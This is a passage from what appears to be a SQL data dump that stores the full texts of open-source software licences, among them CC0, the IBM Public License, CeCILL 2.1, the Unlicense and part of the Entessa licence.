performer(s);\n\niii. publicity and privacy rights pertaining to a person\'s image or likeness\ndepicted in a Work;\n\niv. rights protecting against unfair competition in regards to a Work, subject\nto the limitations in paragraph 4(a), below;\n\nv. rights protecting the extraction, dissemination, use and reuse of data\nin a Work;\n\nvi. database rights (such as those arising under Directive 96/9/EC of the\nEuropean Parliament and of the Council of 11 March 1996 on the legal protection\nof databases, and under any national implementation thereof, including any\namended or successor version of such directive); and\n\nvii. other similar, equivalent or corresponding rights throughout the world\nbased on applicable law or treaty, and any national implementations thereof.\n\n2. Waiver. To the greatest extent permitted by, but not in contravention of,\napplicable law, Affirmer hereby overtly, fully, permanently, irrevocably and\nunconditionally waives, abandons, and surrenders all of Affirmer\'s Copyright\nand Related Rights and associated claims and causes of action, whether now\nknown or unknown (including existing as well as future claims and causes of\naction), in the Work (i) in all territories worldwide, (ii) for the maximum\nduration provided by applicable law or treaty (including future time extensions),\n(iii) in any current or future medium and for any number of copies, and (iv)\nfor any purpose whatsoever, including without limitation commercial, advertising\nor promotional purposes (the \"Waiver\"). Affirmer makes the Waiver for the\nbenefit of each member of the public at large and to the detriment of Affirmer\'s\nheirs and successors, fully intending that such Waiver shall not be subject\nto revocation, rescission, cancellation, termination, or any other legal or\nequitable action to disrupt the quiet enjoyment of the Work by the public\nas contemplated by Affirmer\'s express Statement of Purpose.\n\n3. Public License Fallback. Should any part of the Waiver for any reason be\njudged legally invalid or ineffective under applicable law, then the Waiver\nshall be preserved to the maximum extent permitted taking into account Affirmer\'s\nexpress Statement of Purpose. In addition, to the extent the Waiver is so\njudged Affirmer hereby grants to each affected person a royalty-free, non\ntransferable, non sublicensable, non exclusive, irrevocable and unconditional\nlicense to exercise Affirmer\'s Copyright and Related Rights in the Work (i)\nin all territories worldwide, (ii) for the maximum duration provided by applicable\nlaw or treaty (including future time extensions), (iii) in any current or\nfuture medium and for any number of copies, and (iv) for any purpose whatsoever,\nincluding without limitation commercial, advertising or promotional purposes\n(the \"License\"). The License shall be deemed effective as of the date CC0\nwas applied by Affirmer to the Work. Should any part of the License for any\nreason be judged legally invalid or ineffective under applicable law, such\npartial invalidity or ineffectiveness shall not invalidate the remainder of\nthe License, and in such case Affirmer hereby affirms that he or she will\nnot (i) exercise any of his or her remaining Copyright and Related Rights\nin the Work or (ii) assert any associated claims and causes of action with\nrespect to the Work, in either case contrary to Affirmer\'s express Statement\nof Purpose.\n\n 4. Limitations and Disclaimers.\n\na. No trademark or patent rights held by Affirmer are waived, abandoned, surrendered,\nlicensed or otherwise affected by this document.\n\nb. Affirmer offers the Work as-is and makes no representations or warranties\nof any kind concerning the Work, express, implied, statutory or otherwise,\nincluding without limitation warranties of title, merchantability, fitness\nfor a particular purpose, non infringement, or the absence of latent or other\ndefects, accuracy, or the present or absence of errors, whether or not discoverable,\nall to the greatest extent permissible under applicable law.\n\nc. Affirmer disclaims responsibility for clearing rights of other persons\nthat may apply to the Work or any use thereof, including without limitation\nany person\'s Copyright and Related Rights in the Work. Further, Affirmer disclaims\nresponsibility for obtaining any necessary consents, permissions or other\nrights required for any use of the Work.\n\nd. Affirmer understands and acknowledges that Creative Commons is not a party\nto this document and has no duty or obligation with respect to this CC0 or\nuse of the Work.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(79,'IPL-1.0','IBM Public License Version 1.0\n\nTHE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS IBM\n\nPUBLIC LICENSE (\"AGREEMENT\"). ANY USE, REPRODUCTION OR DISTRIBUTION\n\nOF THE PROGRAM CONSTITUTES RECIPIENT\'S ACCEPTANCE OF THIS AGREEMENT.\n\n 1. DEFINITIONS\n\n \"Contribution\" means:\n\na. in the case of International Business Machines Corporation (\"IBM\"), the\nOriginal Program, and\n\n b. in the case of each Contributor,\n\n i. changes to the Program, and\n\nii. additions to the Program; where such changes and/or additions to the Program\noriginate from and are distributed by that particular Contributor. A Contribution\n\'originates\' from a Contributor if it was added to the Program by such Contributor\nitself or anyone acting on such Contributor\'s behalf. Contributions do not\ninclude additions to the Program which:\n\n(i) are separate modules of software distributed in conjunction with\n\n the Program under their own license agreement, and (ii) are not\n\n derivative works of the Program.\n\n \"Contributor\" means IBM and any other entity that distributes the Program.\n\n\"Licensed Patents \" mean patent claims licensable by a Contributor which are\nnecessarily infringed by the use or sale of its Contribution alone or when\ncombined with the Program.\n\n\"Original Program\" means the original version of the software accompanying\nthis Agreement as released by IBM, including source code, object code and\ndocumentation, if any.\n\n \"Program\" means the Original Program and Contributions.\n\n\"Recipient\" means anyone who receives the Program under this Agreement, including\nall Contributors.\n\n 2. GRANT OF RIGHTS\n\na. Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free copyright license to reproduce,\nprepare derivative works of, publicly display, publicly perform, distribute\nand sublicense the Contribution of such Contributor, if any, and such derivative\nworks, in source code and object code form.\n\nb. Subject to the terms of this Agreement, each Contributor hereby grants\nRecipient a non-exclusive, worldwide, royalty-free patent license under Licensed\nPatents to make, use, sell, offer to sell, import and otherwise transfer the\nContribution of such Contributor, if any, in source code and object code form.\nThis patent license shall apply to the combination of the Contribution and\nthe Program if, at the time the Contribution is added by the Contributor,\nsuch addition of the Contribution causes such combination to be covered by\nthe Licensed Patents. The patent license shall not apply to any other combinations\nwhich include the Contribution. No hardware per se is licensed hereunder.\n\n c. Recipient understands that although each Contributor grants the\n\n licenses to its Contributions set forth herein, no assurances are\n\n provided by any Contributor that the Program does not infringe the\n\n patent or other intellectual property rights of any other entity.\n\n Each Contributor disclaims any liability to Recipient for claims\n\n brought by any other entity based on infringement of intellectual\n\n property rights or otherwise. As a condition to exercising the\n\n rights and licenses granted hereunder, each Recipient hereby assumes\n\n sole responsibility to secure any other intellectual property rights\n\n needed, if any. For example, if a third party patent license is\n\n required to allow Recipient to distribute the Program, it is\n\n Recipient\'s responsibility to acquire that license before\n\n distributing the Program.\n\n d. Each Contributor represents that to its knowledge it has\n\n sufficient copyright rights in its Contribution, if any, to grant the\n\n copyright license set forth in this Agreement.\n\n 3. REQUIREMENTS\n\nA Contributor may choose to distribute the Program in object code form under\nits own license agreement, provided that:\n\n a. it complies with the terms and conditions of this Agreement; and\n\n b. its license agreement:\n\ni. effectively disclaims on behalf of all Contributors all warranties and\nconditions, express and implied, including warranties or conditions of title\nand non-infringement, and implied warranties or conditions of merchantability\nand fitness for a particular purpose;\n\nii. effectively excludes on behalf of all Contributors all liability for damages,\nincluding direct, indirect, special, incidental and consequential damages,\nsuch as lost profits;\n\niii. states that any provisions which differ from this Agreement are offered\nby that Contributor alone and not by any other party; and\n\niv. states that source code for the Program is available from such Contributor,\nand informs licensees how to obtain it in a reasonable manner on or through\na medium customarily used for software exchange.\n\n When the Program is made available in source code form:\n\n a. it must be made available under this Agreement; and\n\nb. a copy of this Agreement must be included with each copy of the Program.\n\nEach Contributor must include the following in a conspicuous location in the\nProgram:\n\nCopyright (C) 1996, 1999 International Business Machines Corporation and others.\nAll Rights Reserved.\n\nIn addition, each Contributor must identify itself as the originator of its\nContribution, if any, in a manner that reasonably allows subsequent Recipients\nto identify the originator of the Contribution.\n\n 4. COMMERCIAL DISTRIBUTION\n\nCommercial distributors of software may accept certain responsibilities with\nrespect to end users, business partners and the like. While this license is\nintended to facilitate the commercial use of the Program, the Contributor\nwho includes the Program in a commercial product offering should do so in\na manner which does not create potential liability for other Contributors.\nTherefore, if a Contributor includes the Program in a commercial product offering,\nsuch Contributor (\"Commercial Contributor\") hereby agrees to defend and indemnify\nevery other Contributor (\"Indemnified Contributor\") against any losses, damages\nand costs (collectively \"Losses\") arising from claims, lawsuits and other\nlegal actions brought by a third party against the Indemnified Contributor\nto the extent caused by the acts or omissions of such Commercial Contributor\nin connection with its distribution of the Program in a commercial product\noffering. The obligations in this section do not apply to any claims or Losses\nrelating to any actual or alleged intellectual property infringement. In order\nto qualify, an Indemnified Contributor must: a) promptly notify the Commercial\nContributor in writing of such claim, and b) allow the Commercial Contributor\nto control, and cooperate with the Commercial Contributor in, the defense\nand any related settlement negotiations. The Indemnified Contributor may participate\nin any such claim at its own expense.\n\nFor example, a Contributor might include the Program in a commercial product\noffering, Product X. That Contributor is then a Commercial Contributor. If\nthat Commercial Contributor then makes performance claims, or offers warranties\nrelated to Product X, those performance claims and warranties are such Commercial\nContributor\'s responsibility alone. Under this section, the Commercial Contributor\nwould have to defend claims against the other Contributors related to those\nperformance claims and warranties, and if a court requires any other Contributor\nto pay any damages as a result, the Commercial Contributor must pay those\ndamages.\n\n 5. NO WARRANTY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON\nAN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS\nOR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF\nTITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\nEach Recipient is solely responsible for determining the appropriateness of\nusing and distributing the Program and assumes all risks associated with its\nexercise of rights under this Agreement, including but not limited to the\nrisks and costs of program errors, compliance with applicable laws, damage\nto or loss of data, programs or equipment, and unavailability or interruption\nof operations.\n\n 6. DISCLAIMER OF LIABILITY\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY\nCONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION\nLOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\nSTRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\nWAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS\nGRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. GENERAL\n\nIf any provision of this Agreement is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this Agreement, and without further action by the parties hereto,\nsuch provision shall be reformed to the minimum extent necessary to make such\nprovision valid and enforceable.\n\nIf Recipient institutes patent litigation against a Contributor with respect\nto a patent applicable to software (including a cross-claim or counterclaim\nin a lawsuit), then any patent licenses granted by that Contributor to such\nRecipient under this Agreement shall terminate as of the date such litigation\nis filed. In addition, if Recipient institutes patent litigation against any\nentity (including a cross-claim or counterclaim in a lawsuit) alleging that\nthe Program itself (excluding combinations of the Program with other software\nor hardware) infringes such Recipient\'s patent(s), then such Recipient\'s rights\ngranted under Section 2(b) shall terminate as of the date such litigation\nis filed.\n\nAll Recipient\'s rights under this Agreement shall terminate if it fails to\ncomply with any of the material terms or conditions of this Agreement and\ndoes not cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If all Recipient\'s rights under this Agreement terminate,\nRecipient agrees to cease use and distribution of the Program as soon as reasonably\npracticable. However, Recipient\'s obligations under this Agreement and any\nlicenses granted by Recipient relating to the Program shall continue and survive.\n\nIBM may publish new versions (including revisions) of this Agreement from\ntime to time. Each new version of the Agreement will be given a distinguishing\nversion number. The Program (including Contributions) may always be distributed\nsubject to the version of the Agreement under which it was received. In addition,\nafter a new version of the Agreement is published, Contributor may elect to\ndistribute the Program (including its Contributions) under the new version.\nNo one other than IBM has the right to modify this Agreement. Except as expressly\nstated in Sections 2(a) and 2(b) above, Recipient receives no rights or licenses\nto the intellectual property of any Contributor under this Agreement, whether\nexpressly, by implication, estoppel or otherwise. All rights in the Program\nnot expressly granted under this Agreement are reserved.\n\nThis Agreement is governed by the laws of the State of New York and the intellectual\nproperty laws of the United States of America. No party to this Agreement\nwill bring a legal action under this Agreement more than one year after the\ncause of action arose. Each party waives its rights to a jury trial in any\nresulting litigation.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(80,'CECILL-2.1','CeCILL FREE SOFTWARE LICENSE AGREEMENT\n\nVersion 2.1 dated 2013-06-21 Notice\n\nThis Agreement is a Free Software license agreement that is the result of\ndiscussions between its authors in order to ensure compliance with the two\nmain principles guiding its drafting:\n\n* firstly, compliance with the principles governing the distribution of Free\nSoftware: access to source code, broad rights granted to users,\n\n* secondly, the election of a governing law, French law, with which it is\nconformant, both as regards the law of torts and intellectual property law,\nand the protection that it offers to both authors and holders of the economic\nrights over software.\n\nThe authors of the CeCILL¹ license are:\n\n \n\nCommissariat à l\'énergie atomique et aux énergies alternatives - CEA, a public\nscientific, technical and industrial research establishment, having its principal\nplace of business at 25 rue Leblanc, immeuble Le Ponant D, 75015 Paris, France.\n\n \n\nCentre National de la Recherche Scientifique - CNRS, a public scientific and\ntechnological establishment, having its principal place of business at 3 rue\nMichel-Ange, 75794 Paris cedex 16, France.\n\n \n\nInstitut National de Recherche en Informatique et en Automatique - Inria,\na public scientific and technological establishment, having its principal\nplace of business at Domaine de Voluceau, Rocquencourt, BP 105, 78153 Le Chesnay\ncedex, France.\n\nPreamble The purpose of this Free Software license agreement is to grant users\nthe right to modify and redistribute the software governed by this license\nwithin the framework of an open source distribution model.\n\nThe exercising of this right is conditional upon certain obligations for users\nso as to preserve this status for all subsequent redistributions.\n\nIn consideration of access to the source code and the rights to copy, modify\nand redistribute granted by the license, users are provided only with a limited\nwarranty and the software\'s author, the holder of the economic rights, and\nthe successive licensors only have limited liability.\n\nIn this respect, the risks associated with loading, using, modifying and/or\ndeveloping or reproducing the software by the user are brought to the user\'s\nattention, given its Free Software status, which may make it complicated to\nuse, with the result that its use is reserved for developers and experienced\nprofessionals having in-depth computer knowledge. Users are therefore encouraged\nto load and test the suitability of the software as regards their requirements\nin conditions enabling the security of their systems and/or data to be ensured\nand, more generally, to use and operate it in the same conditions of security.\nThis Agreement may be freely reproduced and published, provided it is not\naltered, and that no provisions are either added or removed herefrom.\n\nThis Agreement may apply to any or all software for which the holder of the\neconomic rights decides to submit the use thereof to its provisions.\n\nFrequently asked questions can be found on the official website of the CeCILL\nlicenses family (http://www.cecill.info/index.en.html) for any necessary clarification.\n\n Article 1 - DEFINITIONS\n\nFor the purpose of this Agreement, when the following expressions commence\nwith a capital letter, they shall have the following meaning:\n\n \n\nAgreement: means this license agreement, and its possible subsequent versions\nand annexes.\n\n \n\nSoftware: means the software in its Object Code and/or Source Code form and,\nwhere applicable, its documentation, \"as is\" when the Licensee accepts the\nAgreement.\n\n \n\nInitial Software: means the Software in its Source Code and possibly its Object\nCode form and, where applicable, its documentation, \"as is\" when it is first\ndistributed under the terms and conditions of the Agreement.\n\n \n\nModified Software: means the Software modified by at least one Contribution.\n\n \n\nSource Code: means all the Software\'s instructions and program lines to which\naccess is required so as to modify the Software.\n\n \n\nObject Code: means the binary files originating from the compilation of the\nSource Code.\n\n \n\nHolder: means the holder(s) of the economic rights over the Initial Software.\n\n \n\n Licensee: means the Software user(s) having accepted the Agreement.\n\n \n\n Contributor: means a Licensee having made at least one Contribution.\n\n \n\nLicensor: means the Holder, or any other individual or legal entity, who distributes\nthe Software under the Agreement.\n\n \n\nContribution: means any or all modifications, corrections, translations, adaptations\nand/or new functions integrated into the Software by any or all Contributors,\nas well as any or all Internal Modules.\n\n \n\nModule: means a set of sources files including their documentation that enables\nsupplementary functions or services in addition to those offered by the Software.\n\n \n\nExternal Module: means any or all Modules, not derived from the Software,\nso that this Module and the Software run in separate address spaces, with\none calling the other when they are run.\n\n \n\nInternal Module: means any or all Module, connected to the Software so that\nthey both execute in the same address space.\n\n \n\nGNU GPL: means the GNU General Public License version 2 or any subsequent\nversion, as published by the Free Software Foundation Inc.\n\n \n\nGNU Affero GPL: means the GNU Affero General Public License version 3 or any\nsubsequent version, as published by the Free Software Foundation Inc.\n\n \n\nEUPL: means the European Union Public License version 1.1 or any subsequent\nversion, as published by the European Commission.\n\n \n\n Parties: mean both the Licensee and the Licensor.\n\n These expressions may be used both in singular and plural form.\n\n Article 2 - PURPOSE\n\nThe purpose of the Agreement is the grant by the Licensor to the Licensee\nof a non-exclusive, transferable and worldwide license for the Software as\nset forth in Article 5 <#scope> hereinafter for the whole term of the protection\ngranted by the rights over said Software.\n\n Article 3 - ACCEPTANCE\n\n3.1 The Licensee shall be deemed as having accepted the terms and conditions\nof this Agreement upon the occurrence of the first of the following events:\n\n(i) loading the Software by any or all means, notably, by downloading from\na remote server, or by loading from a physical medium;\n\n(ii) the first time the Licensee exercises any of the rights granted hereunder.\n\n3.2 One copy of the Agreement, containing a notice relating to the characteristics\nof the Software, to the limited warranty, and to the fact that its use is\nrestricted to experienced users has been provided to the Licensee prior to\nits acceptance as set forth in Article 3.1 <#accepting> hereinabove, and the\nLicensee hereby acknowledges that it has read and understood it.\n\n Article 4 - EFFECTIVE DATE AND TERM\n\n 4.1 EFFECTIVE DATE\n\nThe Agreement shall become effective on the date when it is accepted by the\nLicensee as set forth in Article 3.1 <#accepting> .\n\n 4.2 TERM\n\nThe Agreement shall remain in force for the entire legal term of protection\nof the economic rights over the Software.\n\n Article 5 - SCOPE OF RIGHTS GRANTED\n\nThe Licensor hereby grants to the Licensee, who accepts, the following rights\nover the Software for any or all use, and for the term of the Agreement, on\nthe basis of the terms and conditions set forth hereinafter.\n\nBesides, if the Licensor owns or comes to own one or more patents protecting\nall or part of the functions of the Software or of its components, the Licensor\nundertakes not to enforce the rights granted by these patents against successive\nLicensees using, exploiting or modifying the Software. If these patents are\ntransferred, the Licensor undertakes to have the transferees subscribe to\nthe obligations set forth in this paragraph.\n\n 5.1 RIGHT OF USE\n\nThe Licensee is authorized to use the Software, without any limitation as\nto its fields of application, with it being hereinafter specified that this\ncomprises:\n\n1. permanent or temporary reproduction of all or part of the Software by any\nor all means and in any or all form.\n\n2. loading, displaying, running, or storing the Software on any or all medium.\n\n3. entitlement to observe, study or test its operation so as to determine\nthe ideas and principles behind any or all constituent elements of said Software.\nThis shall apply when the Licensee carries out any or all loading, displaying,\nrunning, transmission or storage operation as regards the Software, that it\nis entitled to carry out hereunder.\n\n 5.2 ENTITLEMENT TO MAKE CONTRIBUTIONS\n\nThe right to make Contributions includes the right to translate, adapt, arrange,\nor make any or all modifications to the Software, and the right to reproduce\nthe resulting software.\n\nThe Licensee is authorized to make any or all Contributions to the Software\nprovided that it includes an explicit notice that it is the author of said\nContribution and indicates the date of the creation thereof.\n\n 5.3 RIGHT OF DISTRIBUTION\n\nIn particular, the right of distribution includes the right to publish, transmit\nand communicate the Software to the general public on any or all medium, and\nby any or all means, and the right to market, either in consideration of a\nfee, or free of charge, one or more copies of the Software by any means.\n\nThe Licensee is further authorized to distribute copies of the modified or\nunmodified Software to third parties according to the terms and conditions\nset forth hereinafter.\n\n 5.3.1. DISTRIBUTION OF SOFTWARE WITHOUT MODIFICATION\n\nThe Licensee is authorized to distribute true copies of the Software in Source\nCode or Object Code form, provided that said distribution complies with all\nthe provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the Object Code of the Software is redistributed,\nthe Licensee allows effective access to the full Source Code of the Software\nfor a period of at least three years from the distribution of the Software,\nit being understood that the additional acquisition cost of the Source Code\nshall not exceed the cost of the data transfer.\n\n 5.3.2. DISTRIBUTION OF MODIFIED SOFTWARE\n\nWhen the Licensee makes a Contribution to the Software, the terms and conditions\nfor the distribution of the resulting Modified Software become subject to\nall the provisions of this Agreement.\n\nThe Licensee is authorized to distribute the Modified Software, in source\ncode or object code form, provided that said distribution complies with all\nthe provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand, in the event that only the object code of the Modified Software is redistributed,\n\n3. a note stating the conditions of effective access to the full source code\nof the Modified Software for a period of at least three years from the distribution\nof the Modified Software, it being understood that the additional acquisition\ncost of the source code shall not exceed the cost of the data transfer.\n\n 5.3.3. DISTRIBUTION OF EXTERNAL MODULES\n\nWhen the Licensee has developed an External Module, the terms and conditions\nof this Agreement do not apply to said External Module, that may be distributed\nunder a separate license agreement.\n\n 5.3.4. COMPATIBILITY WITH OTHER LICENSES\n\nThe Licensee can include a code that is subject to the provisions of one of\nthe versions of the GNU GPL, GNU Affero GPL and/or EUPL in the Modified or\nunmodified Software, and distribute that entire code under the terms of the\nsame version of the GNU GPL, GNU Affero GPL and/or EUPL.\n\nThe Licensee can include the Modified or unmodified Software in a code that\nis subject to the provisions of one of the versions of the GNU GPL, GNU Affero\nGPL and/or EUPL and distribute that entire code under the terms of the same\nversion of the GNU GPL, GNU Affero GPL and/or EUPL.\n\n Article 6 - INTELLECTUAL PROPERTY\n\n 6.1 OVER THE INITIAL SOFTWARE\n\nThe Holder owns the economic rights over the Initial Software. Any or all\nuse of the Initial Software is subject to compliance with the terms and conditions\nunder which the Holder has elected to distribute its work and no one shall\nbe entitled to modify the terms and conditions for the distribution of said\nInitial Software.\n\nThe Holder undertakes that the Initial Software will remain ruled at least\nby this Agreement, for the duration set forth in Article 4.2 <#term> .\n\n 6.2 OVER THE CONTRIBUTIONS\n\nThe Licensee who develops a Contribution is the owner of the intellectual\nproperty rights over this Contribution as defined by applicable law.\n\n 6.3 OVER THE EXTERNAL MODULES\n\nThe Licensee who develops an External Module is the owner of the intellectual\nproperty rights over this External Module as defined by applicable law and\nis free to choose the type of agreement that shall govern its distribution.\n\n 6.4 JOINT PROVISIONS\n\n The Licensee expressly undertakes:\n\n1. not to remove, or modify, in any manner, the intellectual property notices\nattached to the Software;\n\n2. to reproduce said notices, in an identical manner, in the copies of the\nSoftware modified or not.\n\nThe Licensee undertakes not to directly or indirectly infringe the intellectual\nproperty rights on the Software of the Holder and/or Contributors, and to\ntake, where applicable, vis-à-vis its staff, any and all measures required\nto ensure respect of said intellectual property rights of the Holder and/or\nContributors.\n\n Article 7 - RELATED SERVICES\n\n7.1 Under no circumstances shall the Agreement oblige the Licensor to provide\ntechnical assistance or maintenance services for the Software.\n\nHowever, the Licensor is entitled to offer this type of services. The terms\nand conditions of such technical assistance, and/or such maintenance, shall\nbe set forth in a separate instrument. Only the Licensor offering said maintenance\nand/or technical assistance services shall incur liability therefor.\n\n7.2 Similarly, any Licensor is entitled to offer to its licensees, under its\nsole responsibility, a warranty, that shall only be binding upon itself, for\nthe redistribution of the Software and/or the Modified Software, under terms\nand conditions that it is free to decide. Said warranty, and the financial\nterms and conditions of its application, shall be subject of a separate instrument\nexecuted between the Licensor and the Licensee.\n\n Article 8 - LIABILITY\n\n8.1 Subject to the provisions of Article 8.2, the Licensee shall be entitled\nto claim compensation for any direct loss it may have suffered from the Software\nas a result of a fault on the part of the relevant Licensor, subject to providing\nevidence thereof.\n\n8.2 The Licensor\'s liability is limited to the commitments made under this\nAgreement and shall not be incurred as a result of in particular: (i) loss\ndue the Licensee\'s total or partial failure to fulfill its obligations, (ii)\ndirect or consequential loss that is suffered by the Licensee due to the use\nor performance of the Software, and (iii) more generally, any consequential\nloss. In particular the Parties expressly agree that any or all pecuniary\nor business loss (i.e. loss of data, loss of profits, operating loss, loss\nof customers or orders, opportunity cost, any disturbance to business activities)\nor any or all legal proceedings instituted against the Licensee by a third\nparty, shall constitute consequential loss and shall not provide entitlement\nto any or all compensation from the Licensor.\n\n Article 9 - WARRANTY\n\n9.1 The Licensee acknowledges that the scientific and technical state-of-the-art\nwhen the Software was distributed did not enable all possible uses to be tested\nand verified, nor for the presence of possible defects to be detected. In\nthis respect, the Licensee\'s attention has been drawn to the risks associated\nwith loading, using, modifying and/or developing and reproducing the Software\nwhich are reserved for experienced users.\n\nThe Licensee shall be responsible for verifying, by any or all means, the\nsuitability of the product for its requirements, its good working order, and\nfor ensuring that it shall not cause damage to either persons or properties.\n\n9.2 The Licensor hereby represents, in good faith, that it is entitled to\ngrant all the rights over the Software (including in particular the rights\nset forth in Article 5 <#scope> ).\n\n9.3 The Licensee acknowledges that the Software is supplied \"as is\" by the\nLicensor without any other express or tacit warranty, other than that provided\nfor in Article 9.2 <#good-faith> and, in particular, without any warranty\nas to its commercial value, its secured, safe, innovative or relevant nature.\n\nSpecifically, the Licensor does not warrant that the Software is free from\nany error, that it will operate without interruption, that it will be compatible\nwith the Licensee\'s own equipment and software configuration, nor that it\nwill meet the Licensee\'s requirements.\n\n9.4 The Licensor does not either expressly or tacitly warrant that the Software\ndoes not infringe any third party intellectual property right relating to\na patent, software or any other property right. Therefore, the Licensor disclaims\nany and all liability towards the Licensee arising out of any or all proceedings\nfor infringement that may be instituted in respect of the use, modification\nand redistribution of the Software. Nevertheless, should such proceedings\nbe instituted against the Licensee, the Licensor shall provide it with technical\nand legal expertise for its defense. Such technical and legal expertise shall\nbe decided on a case-by-case basis between the relevant Licensor and the Licensee\npursuant to a memorandum of understanding. The Licensor disclaims any and\nall liability as regards the Licensee\'s use of the name of the Software. No\nwarranty is given as regards the existence of prior rights over the name of\nthe Software or as regards the existence of a trademark.\n\n Article 10 - TERMINATION\n\n10.1 In the event of a breach by the Licensee of its obligations hereunder,\nthe Licensor may automatically terminate this Agreement thirty (30) days after\nnotice has been sent to the Licensee and has remained ineffective.\n\n10.2 A Licensee whose Agreement is terminated shall no longer be authorized\nto use, modify or distribute the Software. However, any licenses that it may\nhave granted prior to termination of the Agreement shall remain valid subject\nto their having been granted in compliance with the terms and conditions hereof.\n\n Article 11 - MISCELLANEOUS\n\n 11.1 EXCUSABLE EVENTS\n\nNeither Party shall be liable for any or all delay, or failure to perform\nthe Agreement, that may be attributable to an event of force majeure, an act\nof God or an outside cause, such as defective functioning or interruptions\nof the electricity or telecommunications networks, network paralysis following\na virus attack, intervention by government authorities, natural disasters,\nwater damage, earthquakes, fire, explosions, strikes and labor unrest, war,\netc.\n\n11.2 Any failure by either Party, on one or more occasions, to invoke one\nor more of the provisions hereof, shall under no circumstances be interpreted\nas being a waiver by the interested Party of its right to invoke said provision(s)\nsubsequently.\n\n11.3 The Agreement cancels and replaces any or all previous agreements, whether\nwritten or oral, between the Parties and having the same purpose, and constitutes\nthe entirety of the agreement between said Parties concerning said purpose.\nNo supplement or modification to the terms and conditions hereof shall be\neffective as between the Parties unless it is made in writing and signed by\ntheir duly authorized representatives.\n\n11.4 In the event that one or more of the provisions hereof were to conflict\nwith a current or future applicable act or legislative text, said act or legislative\ntext shall prevail, and the Parties shall make the necessary amendments so\nas to comply with said act or legislative text. All other provisions shall\nremain effective. Similarly, invalidity of a provision of the Agreement, for\nany reason whatsoever, shall not cause the Agreement as a whole to be invalid.\n\n 11.5 LANGUAGE\n\nThe Agreement is drafted in both French and English and both versions are\ndeemed authentic.\n\n Article 12 - NEW VERSIONS OF THE AGREEMENT\n\n12.1 Any person is authorized to duplicate and distribute copies of this Agreement.\n\n12.2 So as to ensure coherence, the wording of this Agreement is protected\nand may only be modified by the authors of the License, who reserve the right\nto periodically publish updates or new versions of the Agreement, each with\na separate number. These subsequent versions may address new issues encountered\nby Free Software.\n\n12.3 Any Software distributed under a given version of the Agreement may only\nbe subsequently distributed under the same version of the Agreement or a subsequent\nversion, subject to the provisions of Article 5.3.4 <#compatibility> .\n\n Article 13 - GOVERNING LAW AND JURISDICTION\n\n13.1 The Agreement is governed by French law. The Parties agree to endeavor\nto seek an amicable solution to any disagreements or disputes that may arise\nduring the performance of the Agreement.\n\n13.2 Failing an amicable solution within two (2) months as from their occurrence,\nand unless emergency proceedings are necessary, the disagreements or disputes\nshall be referred to the Paris Courts having jurisdiction, by the more diligent\nParty. 1 CeCILL stands for Ce(a) C(nrs) I(nria) L(ogiciel) L(ibre)\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(81,'Unlicense','This is free and unencumbered software released into the public domain.\n\nAnyone is free to copy, modify, publish, use, compile, sell, or distribute\nthis software, either in source code form or as a compiled binary, for any\npurpose, commercial or non-commercial, and by any means.\n\nIn jurisdictions that recognize copyright laws, the author or authors of this\nsoftware dedicate any and all copyright interest in the software to the public\ndomain. We make this dedication for the benefit of the public at large and\nto the detriment of our heirs and\n\nsuccessors. We intend this dedication to be an overt act of relinquishment\nin perpetuity of all present and future rights to this software under copyright\nlaw.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nBE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH\nTHE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nFor more information, please refer to <http://unlicense.org/>\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(82,'Entessa','Entessa Public License Version. 1.0\n\nCopyright (c) 2003 Entessa, LLC. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The end-user documentation included with the redistribution, if any, must\ninclude the following acknowledgment:\n\n\"This product includes open source software developed by openSEAL (http://www.openseal.org/).\"\n\nAlternately, this acknowledgment may appear in the software itself, if and\nwherever such third-party acknowledgments normally appear.\n\n4. The names \"openSEAL\" and \"Entessa\" must not be used to endorse or 